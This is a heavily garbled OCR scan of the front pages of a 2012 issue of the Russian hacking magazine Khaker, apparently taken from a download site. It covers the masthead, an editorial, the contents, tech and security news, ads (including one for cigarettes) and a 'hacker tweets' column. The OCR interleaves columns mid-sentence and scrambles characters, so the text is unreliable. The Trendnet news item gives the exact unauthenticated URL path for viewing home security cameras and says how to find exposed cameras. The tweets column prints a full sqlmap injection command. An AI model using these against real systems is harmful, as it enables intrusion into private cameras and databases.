(game}land hl路l懈n medla <1)
iiiiiiiiiiiiiii ~
~ -芯
ro _
o
路 ~ -N
=::::1
www.epidemz.net
~ .....
Альфа Банк
Оформить дебетовую или кредитную « Мужскую карту» можно в отделениях ОАО «Альфа-Банка », а так же заказав по телефонам :
(495) 229-2222
в Москве
\8-800-333-2-333
в регионах России (звонок бесплатный)
или на сайте
www.mancard.ru :0
:;
"'::2
Q)
0.. х
"'"' "'0.. "' с:
I
ОАО « Ал ьфа-Банк >> . Генераль н ая лицензия банка России на осуществление ба н ковских о п ераций от
www.epidemz.net
29.01.1998 N91326"
!!FiнEP ........
lntro
РЕДАКЦИЯ Главный редактор
Никита «nikitozz» Кислицин (nikitozrareal.xakep.ru ]
Ш еф -р е да ктор
Степан «step» Ильин l steoГcl '"ea l. xake g .ru ]
Вып ускаю щий редактор
Николай «gorl» Андреев lgorlum!areal.xakep.ru]
Редакторы рубрик
PC_ZONE и UNITS
Степан «step>> Ильин
lstepffi '"eal.xakep.ru ] (petya0rea l. xake o.ru ]
взлом
Петр Стаховски
UNIXOID и SYN/ACK MALWARE РR-менеджер
Андрей «Andrushock>> Матвеев (andrushockiOrea l.xakep.ru ] Александр «О г. К!ouniz» Лозовский (alexanderrareal.xakep.ru] Николай «gorl» Андреев [ g oг l umfOreal . xakep . г u ] Людмила Вагизова (vaq lzovaraqk.ru ]
Литературный редактор
Анна Аранчук
КОДИНГ
DVD Выn уска ющий редактор
Антон «ant» Жуков [ antrarea l .xakep.гu ]
Uni х- ра з дел Security-paздeл
Андрей «Andrushock>> Матвеев [ ~ n drushock0 гea l .xa kep.rul Дмитрий «D1g1 >>Евдокимов [evdoklmovdsragmall.com ]
Монтаж видео
Максим Т рубицын
ART Алик Вайнер [al i kiCiglc. гul
Арт-директор Дизайнер
Егор Пономарев
Верстальщик
Вера Светлых
Иллюстрация н а обложке
Алексей Ляnунов и Лена Эрлих
PUBLISHING У чр е дитель
000 «ГеймЛэнд)), 115280,
Москва,
у л. Ленинская Слобода, 19, Омега nлаза,
ВООБРАЖЕНИЕ И РАМКИ
5 зтаж, офис No 21.
Ге н ера льный директор
Дмитрий Агарунов
Ге н е р альный издатель
Андрей Михайлюк
Финансовый дир ектор
Андрей Фатеркин
Дир ек тор по маркетингу
Елена Каркашадзе
У пр ав ляющий арт-директор
Алик Вайнер
Гл ав ныйдиз ай н е р
Знди Тернбулл
Дир ек тор по пр оизво дству
Сергей Кучерявый
Т ел. :
[4951 935-7034, факс: [4951 545-0906
РАЗМЕЩЕНИЕ РЕКЛАМЫ Т ел.: [4951935-7034, факс: 14951 545-0906
РЕКЛАМНЫЙ ОТДЕЛ Заместитель генерального
Зинаида Чередниченко [zina
dachfaglc.ru ]
дир ектор а по продажам
Все по-настоящему новое- это выход за общепринятые рам к и представле ни йотом, что возможно, а что нет, что правильно, а что
абсур дно. Сделать что-то новое, не встречая потока критики и со
Директор груnnы
TECHNOLOGY
Марин а Филатова
Старшие менеджеры
[filatovaraglc.ru ] Ольга Емельянцева [olgaem lfQgk.ru ] Светлана Мельникова [melnikovafaglc.ru )
Мен еджеры
Д м итрий Качурин [ ka c huпniCiglc .г u [ Елена Поликарп ова [ pol i karuovaraqlc.гu ]
мнений- в принципе невозможно, так уж устроены люди. Умение бытьчуточку сумасшедши м и иногда делать вещи, которы е кажут ся окружающим сомнитель ными или даже абсурдными -большое счас тьеl Ведь это снимае т с тебя шоры и по зволяет смотреть на
[работа с рекламными агентствами]
Дире ктор корпоративной групnы
Кристина Татаренкова
Старший трафик-менеджер
вещи шир е, чем остальные л юди.
В детстве у каждого человека все это есть: мы воспринимаем
[tatarenkovarag lc.ru l
Юлия Г ос подинова [gospodinovataglc.ru] Мария Дубровская [ dubгovskayaiCiglc.гu [ Марья Буланова [bulanovataglc.ru }
Старшие менеджеры
ОТДЕЛ РЕАЛИЗАЦИИ СПЕЦПРОЕКТОВ
мир с само го начала, живем и чувствуем все по-настоящему, без
Директор
Александр Коренфел ьд [ koгenfeldiCiglc . гu l
искусстве нны х границ. Н о вот с годами мышление большинства
Менеджеры
Светлана Мюллер Наталия Т улинова
людей сил ьно с т е реотипизируется и в определенный м о мен т разум перестает быть способным прои з водить что-то новое и вы
РАСПРОСТРАНЕНИЕ
хо дить за навязанные снаружи рамки. Дажешнурки завязать п о
Дир екто р по дистриб у ции
новому ч еловек уже не мож е т, не говоря уже о том, чтобы создать с нуля что-то.
Руководитель отдела nодnи ски
Татьяна Кошелева [ koshel eva!Og l c . гu ] Виктория Клепикова [lepikovafQglc.ru ]
Ру ково дитель
Наталья Лукичева [ luk i chevarag l c .гu ]
с n е цраспростран е ния
Пишу это к тому, что желаю и тебе и самому себе прон ести по жизни эту способ ность к созиданию, не ста ть долбаным и зомби. И не обязательно для этого быть Сальвадором Д ал и- место для творчества, дурачества и выдумывания естьабсолют но в любом деле, чем бы ты ни занимался .
nikitozz, гл.ред.Х
Претензии и доnолнительная ин фа: В случае возникновения вопросов по качеству печати и ОVО-дисков:
cla1m0gk .ru .
Горячая линия по подnиск е
Факс для отnравки купонов и квитанций на новые подписки:
[495]545-09-06 Т елефон отдела подписки для жителей Москвы: [495]663-82-77 Т елефон для жителей регионов и для звонков с мобильных телефонов: 8-800-200-3-999 Дл я писем: 101000, Москва, Главnочтамт, а/я 652, Хакер Зарегистрировано в Министерстве Российской Федерации по делам печати, телерадиовещанию и средства м мас совых коммуникаций ПИЯ
77-11802
от
14.02.2002.
Отпечатано в типографии Scanweb, Финляндия. Т и раж 219 833 зкземпляров.
P.S. Как и обещал, публикую фотографию логотипаХ на фоне станции «Восток>>-зто, на минуточку, практически южный полюс.
За фотку респект Сереге Сильновуl
Мн ение редакции не обязательно совпадает с мнением авторов. Все материалы в номере предоставляются как информация к размышлению. Лица , использующиеданную информацию в противозаконных целях, могут быть привлечены к ответственности. Редакция не несет ответ ственности за содержание рекламных объявлен ий в номере.За перепечатку наших материалов без сп роса- преследуем.
По вопросам лицензирования и получения прав на использование редакционных материалов журнала обращайтесь по адресу: c oпtent0_gk_r_!1 .
© 000 «Гейм Лэнд», ХАКЕР
04/159/2012
РФ,
2012
001
www.epidemz.net
Content
1100 МИНИАТЮРНЫХ РОБОТОВ RECON SCOUT Х Т ПРИНЯТЫ СЛ У ЖБ У АРМИИ СШ А: I
008
HEADER 004
016
MEGANEWS Все новое за n оследний месяц
011
О быстром развертывании виртуальных машин
017
hacker tweets Хак-сценавтвиттере
КолонкаСтепанаИльина Proof-of-coпcept
Идея: извлечь парали пользователей
COVERSTORY
Глаз-алмаз Интервью с Александром Галицким
COVERSTORY
018 Опасный двойник Легкий способ подделки кон
трольной суммы и ЭЦП с помощью коллизий
www.epidemz.net
Windows из nамяти
116
PCZONE 030
Универонлайн
106
Звенья одной цепи
102
Можнолистатьспециалистом в IT, не выходя и з дома? Даl
036
-
UNIXOID
Расшарить приложение!
идущих на сменут ех нологиям дня вчерашнего
Учимся переносить запущенные программы с одного ком пь ютера на другой
040
«Google следит за тобой .
Разбираемся с
Мы- нет >>
взлом Easy- Hack Хакерекие се кр еты простых вещей
050
Битвы зеленых роботов
-
СуапоgепМоd
Анал и зсвеже нькихуязвимостей
056
ASP.NET: темная
12 2
сторона трассировки
Эксплуатируем систему регистрации и монит оринга исключе ний ELMAH
060
Взлом
128
Maii.Ru Агента
Пол уч аем доступ к истории переписки и контактам в популярном мессенджере
064
Будни халявщика Н евыдуман на яис т орияосерьезныхуязвимостяхпровайдера
068
Тибериумный реверсинг
134
ВнедрениеХ-кода и вирт уальная машина: теория и практика
072
X-Tools
139
Пр ограммы для в з лома
MALWARE 074
С антивирусами покончено! Последняя статья об устройстве аверов: монитори н г сетевой активности и песоч ниц ы
080
Выбираем альтернативную Апdгоid-прошивку:
116
Обзор зксплоитов
Неизвестнаяугроза
Новаязратерминальныхсистем Разворач иваем инф рас труктуру
Разворачиваем отказоустой чивый сервис хранения данных на базе
!Т- решени я от Mic r osoft: обзор гла вны х новино к 2012 года
FERRUM Сетевой форсаж Тести ров а н и е топовых р аутеров Просто конфетка!
Обзор порт ативной акустической системы Ed i fieг М Р1 5
FAQ UNITED
143
Диско
144
WWW2
Большой FAQ
8.5 Гб всякой всячины
метод инжекта
Тгuе-криптование
Д обавляем поддержку своих алгор итм ов в Tru eCrypt Задачинасобеседованиях Интересныезадания,которыедаютнасобеседования х
096
Паттерн << Шаблонный метод>>
100
WМI:обходзащит
Plus
юн и ты
кода и ав тозагрузки
092
Samba
Свежеедыхание
И спользо вание Shim Епgiпе для внедрения
088
VDI на Wiп2k8R2 и Liпux
Неизменно высокая доступность
Удобные wеЬ-сервисы
КОДИНГ Shim: новый
vs MIUI
SYN/ACK
140
Испытываем эв ри стикуа в еров на самых новых вирусах
084
kobjects, sysfs, udev, udisks и upo weг
11 1
1О причин обратить внимание на поисковик Duc kDuckGo.com
044
Новыевременатребуют перемен Описан и е технологий ближайшего будущего,
Инкапсуляц ияалг оритмов Неожиданный взгляд на привычные вещи
www.epidemz.net
MEGANEWS
НА PASTEBIN ПОЯВИЛСЯ АНОНС ГРЯДУЩЕЙ ОПЕРАЦИИ нГЛОБАЛЬНЫЙ БЛЭКАУТ». На31мартаякобызапланирована распределительная атака на
13 корневых
DNS-cepвepoв .
УБИЙЦАТЕЛЕВИДЕНИЯ
ПРИСТАВКИ НА СЛУЖБЕ
СОЗДАТЕЛЬ ПРОТОКОЛА BIТТORRENT ПРИДУМАЛ КОЕ-ЧТО НОВОЕ
полиции
к
ог~а Брэм Коэн создавал протокол ВitТоггепt, желая сделать «что-то
ПРАВООХРАНИТЕЛИ ТОЖЕ СТАРАЮТСЯ ИДТИ В НОГУ
деиствител ьно полезное людям>>, он совсем не ожидал такого от
С ПРОГРЕССОМ
клика и такого успеха. П ристальное и не всегда приятное внимание
к его персоне, неожиданные пожертвования, посыпавшиеся от благодарных Коэна от ВitТоггепt. Но, к счастью, он все же продолжи л заниматься его под
держкой и разработкой.
гочисленным операциям
хакеров,причисляю
щих себя к Aпoпymous,
Недавно Брэм анонсировал н овую версию протокола, получившую имя
ВitТоггепt
лагадаря мно
Б
пользователей, и сумасшедшая популярность его детища едва не отвратили
Live. На разработку Коэн потратил три года, и предназначается
у специалистов и про
новшество для организации видеотрансляций через пирингавые сети. Теперь
стыхпользователей
даже при многомиллионной аудитории задержка передачи видео не должна
появилось н емало
превы шать и пяти секунд. ВitТоггепt
«информации к раз
Live позволяет снизить нагрузку на рас
пространителя файла до
99 %. По словам Коэна, передача видео таким обра з ом будетстоить дешевле, чем по спутнику или с помощью CDN, и для нее не по
мышлению>>. Нап ример, в концепрошлогогода
требуется дорогостоящая инфраструктура. Бета-версия доступна по адресу
в Сеть слил и огромный
.," о
live. bittorrent.com, и автор уже заявляет, что BitTorreпt Liv e убьеттелевидение
"
в его текущем виде- должна кануть в лету физическая и нфраструктура ТВ.
Теперь Коэн находится в активном поиске партнеров, которые дадут согласие
apxивl pasteЬin . com/
Nw N8ehFWI спись мами представителей
на распространение своего контента по предложенной им модели. Известн о,
правоохранительных
что разработкой уже заинтересовались в
ор ганов , в том числе-
Netflix и Hu lu.
данные с Gmаil-аккаунта Министерства юстиции киберпреступлений Калиф орн ии.
а СамБрзмне с лишком одобряетвесь се годняшний пират ский бум и ни когда ничего не скачивал
нелегально . Он хо рошо понима ет,
МРАА ,
RIAA и nрочи е
организации б у д ут
Эксперты
Ars Techпica основательно покапал ись в этом
архиве и пришли к интересн ым выводам. Оказывается, ХЬох, РSЗ и
iPad сегодня стали одн ими из основных
средствпоискадоказательстввсудебныхрассле довани ях. Временные отметки в сохраненных играх, контрольные
точки lчекпоинтыl и даже скриншоты (например, такие, как делает ХЬох Kiпectl,- все это является доказатель-
только рады , есл и
ством и может помочь в решении вопроса о виновности
он это сделает. н Ни
подозреваемого.
в коем с л учае не хочу давать им пов од, они навернякатолько этого и ждутн,
говорит Коэн , и , вероятнее всего , он
nрав .
Такжеучастилось использование полицией онлай
новых сред (таких как ХЬох Livel для общения с подо зреваемы ми и ведения записи переговора в. отмечает, что компания
Ars Techпica Microsoft вообще заре ги ст риро
вала «законный перехват>>, то есть систему, позволяющую вести прослушку интернет-переговор ов , в том числе
в ХЬох
Live
или
Skype.
111 Windows8 ВЛАСТИ ИРАНА НАЧАЛИ
BWINDOWSS НЕ БУДЕТ КНОП-
В КАЗАХСТАНЕ ПРЕКРАТИ-
BANDROIDMARKET
ГЛУБОКУЮФИЛЬТРАЦИЮ
КИ нПУСК>>, хотя связанная
ЛИ РАБОТУ ПРАКТИЧЕСКИ
ПОЯВИЛСЯ АНТИВИРУС.
ИЗГPYППЫSWAGGSECURIТY.
трафика на магистральных
с нейфункциональность все
ВСЕ КРУПНЫЕТОРРЕНТ-
СервисВоuпсегбудет
Данные о серверах, информа-
FOXCONN ВЗЛОМАЛИ ХАКЕРЫ
каналах связи, убивая все
же сохранится в системе .
ТРЕКЕРЫ, что связано
автоматическисканировать
цию о партнерах компании,
SSL-соединения . Протокол
Также ОСобзавелась новым
с вступившими в силу в конце
всеприложениянапредмет
логины и пароли, и даже
НТТРSнеработаетнина
л ого.
января изменениями в за-
содержания вирусов и иных
платежные документы
конодательствестраны .
вредоносных программ .
выложили на ТРВ .
одном сайте .
Apple
ХАКЕР 04/159/ 2012
004
www.epidemz.net
01 ЕЖЕНЕДЕ/\ЬНИК В Э/\ЕКТРОННОМ ФОРМАТЕ ВЫХОДИТ В СУББОТУ УТРОМ
02
03
04
ГЕРОИ И 3/\ОДЕИ
АНГ/\ИЙСКОЙ
READER@GLC.RU ИЩЕМ ABTQPOB.
КАЖДУЮ НЕДЕ/\Ю НАШ КО/\УМНИСТ
ПРЕМЬЕР -1\ИГИ ПО ПОНЕДЕ/\ЬНИКАМ
ПРИСЫ/\АИТЕ ИНФОРМАЦИЮ О СЕБЕ
КУ/\ЬТУРЕ
www.epidemz.net
О ФУТБО/\ЬНОЙ
MEGANEWS
СОЦИАЛЬНАЯ СЕТЬ <<ВКОНТАКТЕ~~ окончательно перебралась на международный домен vk .com .
УЯЗВИМОСТЬ В УСТРОЙСТВАХ
ДОБРО ПОЖАЛОВАТЬ
TRENDNET
В ДОПОЛНЕННУЮ РЕАЛЬНОСТЬ!
ЧТОБЫ ПОСМОТРЕТЬ ВИДЕО, ДОСТАТОЧНО ЗНАТЬ ТОЛЬКО IР-АДРЕС КАМЕРЫ
GOOGLE СОБИРАЕТСЯ ВЫПУСТИТЬ УСТРОЙСТВО AUGMENTED REALIТY
1!1
Сетидавным-давно циркулируютслухи ото м, что у корпорации
Google есть секретные подразделе
ния, где ведется разработка безумных гаджетов,
чуть ли не сборка Терминаторов. А недавно появились со общения, что сейчас в жилых домах сотрудников компании проводитсятестированиенекоего«прототипаразвлека
тельного устройства», работающего в составе домашней сети и способного подключаться к бытовой электронике посредством Wi-Fi и
Bluetooth. Возможно,
речь отелевизи
онной приставке oтGoogle, а возможно-о панели управ ления умным домом. Доподлинно ничего не известно, ведь
Trendnet уже nри з нала , что с 2010 года данная уязвимость
действительно прис у тствует в
26
моделя х ее ви
деокамер , и недавно
опубликовала нов ую версию прошивки, которая закрывает
информация просочилась в сеть случайно-из заявки на разрешение означенного тестирования, которую
Google по
дала в американскую Федеральную комиссию по коммуни кациям. Большая часть таких сообщений, увы, так и остается слухами, не получая ни подтверждений, ни опровержений.
Но информация, nоявившаяся в Сети в этом месяце, носит иной характер. Сначала вспомним ото м, что еще в декабре прошлого года начались первые разговоры ото м, что в
Google работают над какими-то очками, которые в народе Google Glasses. Информация происходила из солидного источника - издания NewYoгk Times, которое
дырк у.
тут же окрестили
к
омпания Tгendпet широко известна благодаря своим системам домашнего видеонаблюдения. Но
не замечено в распространении «желтухи». Подробностей
и у любого крупного вендара случаются оплош
было мало: некое «носимое>> устройство, вероятно, конку
ности. Недавно в версии прошивки 1.1.0 lbuild 104) была
рент будущего
обнаружена уязвимость, позволяющая подключаться
и домь1слов, например ото м, что Google обратила внимание
iPod nano.
Появилось множество догадок
к системеТгепdnеt через интернет и смотреть видео
на так называемый
с любой IР-камеры: достаточно просто ввести ее IР-адрес
из компьютерных игр и обозначает часть графического ин
и добавить к нему nуть из
терфейса пользователя, служащую для отображения важ
15 символов, одинаковый для
всех моделей. Никакого па рол я не нужно. Для доступа
Heads-Up Display IHUDI. Термин пришел
ной информации во время игрового процесса. Разумеется,
к видеопотоку !даже если он запаролен), достаточно про
это наводило на мысли о дополненной реальности. Между
стодобавить в конце пyть/anony/mjpg.cgi, и весь контент
тем, сайт 9to5google.com узнал больше деталей и писал, что
прекрасно отображается. Например, введя такой адрес:
http:l/192.168.1.3/anony/mjpg.cgi, ты получишь беспа
поданным их источника разработка уже на стадии позднего прототипа. И вот прошло больше двух месяцев, пессимисты
1
ральны й доступ к домашней системе видеонаблюдения,
которая установлена на 1 Р-адр есе
192.168.1.3.
уже наверняка мысленно похоронили проект, но данные
о загадочном девай се поя вились снова, на сей раз более
1
Совсем не удивительно, что эта новость уже разлете
подробные. Итак, источник 9to5goog le.com сообщает:
лась по сети, на Pastebiп выложили список более чем на
1 000 IР-адресов, 1
немнагим меньше собрали на
<<Прототип уже на поздней стадии разработки и выглядит
Reddit.
ТRЕПDПЕТ
Р-адреса систем видеонаблюдения также легко ищутся
через
shodanhq.com,
iV~P11 0WN
который для этого и предназначен.
в точности как обыкновенные очки в тяжелой оправе. В них встроен дисплей с НUО-интерфейсом. На дужках есть не сколько кнопок, и если бы не они, очки невозможно было бы
Достаточно ввести поисковый запрос [netcam).
отличить от обь1чн ь1х. Н асколько нам известно, это не перифе
рий но е устройство для других And гоid-девайсов, как сообщал ТОП ПЛОХИХХОСТИНГОВ СОСТАВИЛА КОМПАНИЯ
GROUP-IB
NYT, - очки напрямую связываются с облаком. Однако они Bluetooth 4.0. Область приме
могутиспользовать Wi-Fi или
нения-дополненная реальность, которая будет привязана
к сервисам геолокации
Google. Пользователь можетгулять,
а на дисплее очков, в духе Терминатора, будет всплывать информация об увиденных предметах. Очевидно, очки имеют
ПО РЕЗУЛЬТАТАМ
ИССЛЕДОVВАНИЙ САМЫЙ
ОПАСНЫИНАКОНЕЦ2011 ГОДА ХОСТЭАРЕГИСТРИРОВАН В ЛИТВЕ-ЭТО HOSTING MEDIA.
встроенный
GPS и, по-видимому, работают на Andгoid».
Известно, что дисплей есть толькодля одного глаза, он непрозрачный и без 30. Навигация по интерфейсу осущест вляется с nомощьюдвижений головы, она проста, и к ней,
пишeт 9 to5google.com , оченьлегко привыкнуть. Движения головы будут практически незаметны для окружающих. Тех нические характеристики очков, вероятно, будутсапоста ви мьl сАndгоid-смартфоном. Ну и самое интересное: сообщает
ся, что
Google может выпуститьустройстводовольно скоро.
ХАКЕР
006
www.epidemz.net
04 /159/2012
www.epidemz.net
MEGANEWS
АПДЕЙТУСТРАНИЛ 20УЯЗВИМОСТЕЙ ( включая одну критическую) в стабильной версии Google Chrome 17.0.963 .46 .
SYMANTEC УТВЕРЖДАЕТ,
ЧТО
В КИТАЕ МОБИЛЬНАЯ ЭПИДЕМИЯ БОТНЕТ ИЗАNDRОID-УСТРОЙСТВ ЗАМЕЧЕН В ПОДНЕБЕСНОЙ
РОБОТЫ НА ВООРУЖЕНИИ АРМИИ США КРУПНУЮ СДЕЛКУ
пециалисты компании Symantec обнаружили
D
малварь под названием
RootSm art,
которая
а
в
110-140тыс.
догово ренностя м, до
енное ведомство С Ш А заключило контакт с ком
панией Rесоп
Robot ics, для
которой это круп
нейшая с делк а за всю историю сущес т во вания . Согла сно
активных у стройств
распространяе т ся в альтернативных китайских
мерикан ские вое нны е тоже любят гаджеты. В о
в день-таков итог
31
мая тек ущего г ода армии С Ш А
будет поставлена партия из
роб отов
анализа трафика на
Rесоп
Andгoid M a г ket подобного, к счастью, обнаружено не
С&С - серве ра х . Спе
миллио н ов долларов . Помимо роботов, военные заказали
ц иа л исты считают ,
Scout ХТ.
1100 миниатюрных
каталогах программнаго обеспече ни я. В официально м
Заказ оценивается ни много н и мало в
было. Roo tSma гt ус танавлива ется вм есте с обыч н ым ПО
ч т о ботнет ф ункцио
дополните л ьных аксессуа ров для R есоп
из каталога, н о при э том п е ред ает на уд але нны й сервер
нир ует приблизи
миллион доллар ов.
ном е р
те ль на с се н тяб р я
IMEI , номер IMSI,ID соты,lосаtiопагеа code и
код
2011
мобильн ой се ти.
го д а.
Scout Х Т еще
на
<< Несмотря на малый размер, эти машины сыграют
ог ромную роль в обеспечен ии наших бойцов актуальной информацией о происходящем на п оле боя>>, - заявил
RootSm a гt- в сего вторая прогр амма nосл е из
вестного Giпgeг Masteг, которая на практике применила
представитель R есоп
известный экс плойт Gingeгbг eak. Н о, в отличие от пр е д
сколько месяцев назад военные уже закупили
шественника, R ootSmaгt н е п оставляется в комnлекте
роботов , в Пентагоне с этим абсолютно согласны.
Robotics.
Судя п отом у, что не
315 таких
Чтопр едст авляют соб ойэтичудо-железяки?Rесоп
с гооt-эксnлойтом , а п одгружает G ingeгbгeak с удален но г о сервера уже nосле ус тан о вки. Rо оt -э ксnлойт идет
Scout ХТ - это автономная
в архиве
че т кости в тит ановом корnусе, способная пере дават ь
shells.zip
13.9
в комплекте с двумя вспомогательным и
видеокамера высокой
качественную карт ин к у наналадонн ик оператора. Проч
скриnтами для у становки в систе мную область. П осле рутования телефона програм ма по дгр ужаете удаленного
ная конструкция ро бота п озволяет в букваль н ом смысле
сервера еще и Dг oid
забрасывать его на ра сстоя ние до
Live,
которая уже исп олняет роль
сре д ства у дал е нн о гоадмини ст рир ования и выполня ет
всего поражае т способность
36 метров. Но боль ш е Recon Scout ХТ преодол е
команды с сер вера. Таким образом телефон ста н овится
вать вертикальные препятствия. Эта кроха может бо дро
частью ботнета, и на порута н ном т е леф о н е хозяин бот
nеремещаться и маневрировать на вертикальной с т е не
нета, по сут и , может инициир ова ть любы е д ейс тви я. П о о ц енкамспециа листов , ботнетп ри н оситсвоимхозяевам
[youtu .be/5fzi7fxknlc ]l И с пользуя инфракрасный се н со р и бесшумный при в од, Rесоп Scout ХТ может впл от ную по
от
добр аться к <<логову врага » , не возбуждая подозрений.
1 600 д о 9 000 доллар о в
в су тки.
WEXLER.BOOK Т7007 ЭЛЕКТРОННАЯ КНИГА ПОД УПРАВЛЕНИЕМ ОС п ро д ажу п осту пила электронная
Объем встроенной памяти составляет В ГБ , н о
книга
при желаниии его можн о расш ири ть до
WEXLER.BOOK Т7 007, рабо тающая на базе Andгo i d 2.3. Техни ческие характеристики новинки т аков ы: 7" сенсо рны й LЕD-экран с ф у нкци ей Multi-Touch, дв ух ъядерный процессорАRМ9, с частотой 1,2 Г Гц и встроенный а д аnтер Wi - Fi [1 ЕЕЕ 802.11 Ь/g/n ] со скоростью доступа до 150 М Бит/с.
[]
ANDROID 2.3
помощью карт
32 ГБ с MicroSD . WEXLER.BOOK Т7007
т акже оснащается датчик ом простра н ствен
наго пол оже ния G- сенсор, и функцией под
клю ч ения внешних U SВ-устройств [USB OTG]. Ридер выполнен в эргономичном металличе ском корпусе и пос т авл я ется в кожаном чехле.
Длит е льн ое время раб оты устройству обе
Ориентировочная розничная ц е на н ови нки
спечивает аккумулятор емкостью
-4999
3700
мАч.
руб.
ХАКЕР 04/159/2012
008
www.epidemz.net
Можно все! Нельзя стоять на месте Ищем менеджеров по рекламе
job.glc.ru
(game}land Работа в стиле
www.epidemz.net
funk
MEGANEWS
ПОДВЕДЕНЫ ИТОГИ ПЕРВОГО ГОДА РАБОТЫ ПРОГРАММЫ
BUG BOUNТY: Google выплатила за ба г и более 410 ты с . долларов .
ВИРТУАЛЬНЫЕ РЕАЛИИ И ДРУГИЕ ИНТЕРЕСНЫЕ ВЕЩИ О ЛЕКЦИИ ДЖЕРЕМИ БЕЙЛЕНСОНА И КРУТОМ ОБРАЗОВАТЕЛЬНОМ ПРОЕКТЕ
1!1
середине февраля жители М осквы [и нетолькоони, но об этом поговорим ниже] могли прис у тствовать Но лекции Джереми Бейленеона - основателя
лаборатории Viгtual
Human lnteгaction Lab в Стэндфорд
ско м университете [ vh il .staпfoгd . edu ]. Будучи профессором факультета коммуникаций, Бейленсон нетолькатрудится в одной иэ самых крутых лабораторий виртуальной реаль ности в мире, но и специализируется на когнитивной психо
логии . Проще говоря, ему интересно, каким образом люди могутосознавать себя, когдафизически е условности пер е стают иметь значение. Лекция под названием << Бесконечная реальность»прошлаврамкахдистанционногообразова
тельного проекта Knowledge Stгeam [ know l edgestгeam . гu ]. Как ты nонимаешь, ключевым словом здесь является <<дис танционныЙ >>. В се мероприятия можно совершенно бес
nлатно по сетитьлично, приехав в <<Цифровой окт ябрь>>, но можнотакже посмотреть в прямом эфире или в архиве, ведь
..
ихтранслируютвинтернетдлядесятковтысячзрителей.
Синхронный перевод и НО -качество прилагаются. Джер еми Бейленсон начал свое выстуnление немного необычно да~им
-вместо телемоста аудитории предложили посмотреть
YIII>IБKИ
вступительноевидео. П осредством20-минутнойзаписи Бейленсон объяснил, что не станетсегодня фокусироваться
~ Roitetecom
на технологиях и методологии, так как всю информацию о них можно найти в Сети, но расскажет о результатах ряда экспериментов. Р ечь шла о цифровых а ватарах в самом
широком смысле этого оnределения: практически о любой цифровой репрезентации человеческой личности, будтода голос, передан ны й по
Skype, персенаж онлайновой игры или
воссозданная п ри по м ощи с п ециального П О точн а я вирту альнаякопияреальногочеловека.НапримерахБейленс он рассказывал, как человек воспринимаетсебя, в тех или и н ых виртуальных условиях, в <<телах>> различных аватаров.
К примеру, пациентожогового отделения во время пере
оставлять в сети так называе мые <<цифровые отпечатки>> [то
вязки, разумеется, испытывает боль. Но исследования пока
есть прак тически любые с леды] и, кон ечно, не обошлось без
зали, что если на голову пациенту одеть шлем виртуальной
обсуждения потенциального вреда, который может нанести
реальности, которыйпе р енесет его в холодный мир, где
человеку излишн ее погружение в вирт уальность .
Стоит заметить, чтодругие лекции проекта
много снега, льда, потрясающей красоты кристаллов и так
далее, ощущения бо л и снижаются едва ли не на
90%.
По окончании видео Д жереми уже лично присоединился
Дистанционный обра зовате ль ный прое к т Kпowledge был з апущен осенью
Stream 2011 год а
Ц е нтром новых технологий и технологического nредпри
Knowledge
нимат е льства
Digital Dctober. Ге
неральным партнером Kпowledge
Stгeam свободнодо ступны на сайте про ек та и тоже стоят
Stream выст у nает к омпания
озна комления. К примеру, недавнолекцию читал Джан
« Ростелеком н , интеллектуаль
к беседе, немногодополнив изложенное в ролике. На
Перри Барл оу - основатель и вице-председатель E lectгo nic
ступила очередьтрадиционных вопросов из зала и беседы
Fгontieг Founda tion, эксперт по компьютерной безопасности,
с экспертами. Аудитория интересовалась, не аватарли,
а так же поэт и эссеист. Д искусс ия о копирастах, авторских
часом, сам Б ейленсон, ч т о ждет нас в будущем, опасно ли
nравах и свободе информации вышла крайне интересной.
ным партнером- се Российская венч у рная компания н.
УЛЬТРАНОВОСТЬ ОТ ~~ЯВЫ ЗОЛОТОЙ»! <<Я в а Золотая » представляет новую версию сигаре т
решений от << Я вы Золотой>> и выбери вкус, оnтимально
с филыром-мундштуком- << Ява Золотая Ультра
nодходящийименнотебе! « ЯваЗолотаяУлыраТур
Турбо >> .
бо >> - это современный дизайн, традиционно высокое
Теперь сигареты << Я в а Золотая >> с филыром
качество табака и nопулярный во всем мире фильтр!
мундштуком представлены в двух версиях- Турбо
Новые сигареты обладают всеми качествами nервой
и Ультра Тур б о . Безуnречное сочетание отборных
версии- смелого решения
сортов табака и мировых технологий nозволили
Турбо >>, при этом содержание смолы и никотина в
нам nо-новому раскрыть уже знакомый турбовкус!
дыме сигареты существенно ниже : смолы-
Почувствуй nреимущества смелых технологичных
никотина-
0,4 м г,
СО-
2011
года << Я вы Золотой
4 м г,
5 м г.
МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ www.epidemz.net
1!!1 liiil
ГclnOObznet:
ГciFirefoxNightly:
./sqlma p.py -u http://uгl/ --cгa wl=5 --level=5 --гisk =3 --thгeads=10 <-
для всех dll-модулей в пла
может дать некоторые практи
Ты может быть и нуб, но ты ну б
гинах [для Виндыl так как
ческие результаты, но не из-за
Комментарий:
Шутки шутками, но sqlmap- дей
ствительно крутая тулза для эксплуатаций
<<Физика - как секс: конечно,
АSLRтеп ерь обязателен
нe-ASLR модули могут разрушить всю
э того мы ей занимаемся.>>
безопасность http://t.co/JQFdZгZ4
Ф ей нман
El
Комментарий: Хороший ход для F iгefox, но ...
SQLi-дыpoк.
lcl Доктор Ричард
<3
1!!1 Комментарий: liiil Рича рд Филлипе Фейнман [англ. Richaг d
Phi ll ips Fеуп mап ; 11 мая 1918 - 15 19881 - выдающийся амери
февра л я
канск ий ученый. Основные достижения
Гclpa_kt :
Эксплуатаци я
Я предлагаю заменить выра жение << как отнять конфетку
у ребенка» на <<как обойти
антив ирус>> ... По сути- одно и то же
:1
1!!1 Комментарий : liiil Обхождение антивируса, чаще всего, не сама я сложная задача при пентесте, тут
Крис прав ..
CVE-2011-2371
[Fiгef ox гeduc e Rightl без исполь
Один из создателей квантовой электроди
зования нe - ASLR модулей :
намики. В
годах входил в число
Ал амосе .
1!!1 Комментарий: liiil ... но этого не достаточно! Увлекательное чтиво про эк сп луата цию дыры в F i гefox с обходом
ASLR
DEP
и
AS LR . ROP
обход ится не через
в нe-ASLR модулях, а через утечку базо вого адреса
dll
и уже последующего построе ния
RОР - программы для получ енной d ll' ки.
Валидный Ja vaScг ipt: tгу { х;} catch[ 1{ coпsole. log[ 'CODE, У U NO WORK '1; } http://t.co/RT JaNUij
1!!1 Комментарий: liiil Забавное мини-ис следование на тему
Один из моих фаззеров упал с крешем,- плохо, что не экс
